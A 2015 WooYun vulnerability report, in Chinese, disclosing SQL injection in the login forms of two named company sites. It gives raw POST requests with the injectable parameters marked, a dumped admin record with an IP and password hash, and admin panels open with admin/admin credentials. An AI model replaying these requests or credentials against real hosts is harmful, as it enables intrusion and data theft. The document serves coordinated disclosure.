当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115078

漏洞标题:醋溜科技两个SQL注入

相关厂商:醋溜科技

漏洞作者: mango

提交时间:2015-05-20 11:41

修复时间:2015-07-04 12:50

公开时间:2015-07-04 12:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

注入出的数据已经全部删除~~~没做任何备份~

详细说明:

先说主站的

POST /admin/index.php/login/check/time-1432056059-ajax-true HTTP/1.1
Content-Length: 359
Content-Type: application/x-www-form-urlencoded
Cookie: cp_language=zh; PHPSESSID=stvqic6b9l6g5slu5qmco9g0m5; admincp_language=zh
Host: www.culiu.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: */*
password=g00dPa%24%24w0rD&user=*


post注入 参数user 问题

RP8{}[ZGRQBCT$3WW]W@OOA.png


H{%0@3D]TGWA@D)O_GB}Q0R.png


B0XO$J5{G}GL4WCFS$R2)F9.jpg


找下后台登录密码

K4)HD57}3J6Q4]UUW[J9_OG.png


[1 entry]
+----+-----+----------------+------+--------+--------+------------+----------+-----------+-------------
---------------------+------------+
| id | gid | ip             | keep | status | user   | regtime    | loginnum | nicename  | password
                     | logintime  |
+----+-----+----------------+------+--------+--------+------------+----------+-----------+-------------
---------------------+------------+
| 1  | 1   | 106.39.117.174 | 1    | 1      | admin  | 1350138971 | 123      | chuchujie | ce8b82727b68
97432aa29a83362765a8 | 1427161432 |
+----+-----+----------------+------+--------+--------+------------+----------+-----------+-------------
---------------------+------------+


不过可惜密码解不出来

漏洞证明:

http://doc.culiu.org/index.php?s=/Public/login
文件管理系统的

POST /index.php?s=/Public/checkLogin HTTP/1.1
Host: doc.culiu.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://doc.culiu.org/index.php?s=/Public/login
Cookie: PHPSESSID=f837n4o2fbe8s2ip4el7rn7ei7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
account=*&password=1&__hash__=7ea392413e34f468cfb96f01fc7d279e_38f1fcbf4458e83aa830e0ae0918c3c2


account 参数问题

AK$8YE65OY5TZW1Z1424`GG.png


~L(`PZTPR4GX5X2T$(AE`5V.png


http://help.chuchujie.com/index.php?s=/admin/config/group.html
http://help.culiu.org/index.php?s=/admin/index/index.html
弱口令 admin admin

[VCX{5ANXWOS(Q}Q$FFG(O6.jpg

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-20 12:49

厂商回复:

感谢mango发现的漏洞,我们会尽快修复

最新状态:

暂无

漏洞评价:

评论